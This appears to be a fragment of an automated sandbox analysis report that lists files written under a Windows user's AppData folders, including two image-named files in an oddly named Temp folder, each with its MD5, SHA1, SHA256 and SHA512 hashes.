| MD5 | f36ec3e260ff949ec1bdcc12da7c54d3 |
| SHA1 | 59cd5a675e715fd5b0ee2f5a7f207124ef20e6da |
| SHA256 | 60def137bf25695268535fd392f08b0820789f6549ea7e9bf87731a187a3279b |
| SHA512 | abbb4d5f7025614ae7fee4933c14333c10214eefc8be5b8d1f58577a9a0694bf84e6811640c0c51dbe12313f7e48bf5b3071ad89aec963cac1e5b6d15c9f22b8 |
C:\Users\Admin\AppData\Local\Temp\ββββββΒ ββ β\Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\ββββββΒ ββ β\Common Files\Pictures\RestoreExport.jpeg
| MD5 | 4b350c9e42b76c527c0da1a784094673 |
| SHA1 | 9c4aee0aaea9610b1f157cf0ee5d085ca5c03e97 |
| SHA256 | 76e66e929997288502ee4e51a1917a9e7fbfd8756a788eaa19ec92d0e87db1df |
| SHA512 | 8f0b51ac4337ad35ffcbdafc983742d7f38a915d36303a7d9b6fc1b12bc9a0db129f078c1dd1f835fc94ef1b381335081990b5ec998ea57405bcb1c47ea0336a |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 6e2dd918b2c22ec9d38424b34577d88b |
| SHA1 | ce9b5ec7934ace13a02d64f494ec8cf6de8ce5c9 |
| SHA256 | 037e7f2cd9d518cafd37f55edee61feac13b4dfdd35f67b41d7af525d93b7f0f |
| SHA512 | fe292b07ea0f7db690e00640f29b5cf7de32ddcdc887c24075801e1b7ad756e94dab31e297efff6c9def49ec3ac20e22c71ba40afb7e4fb75bf0678b64328eca |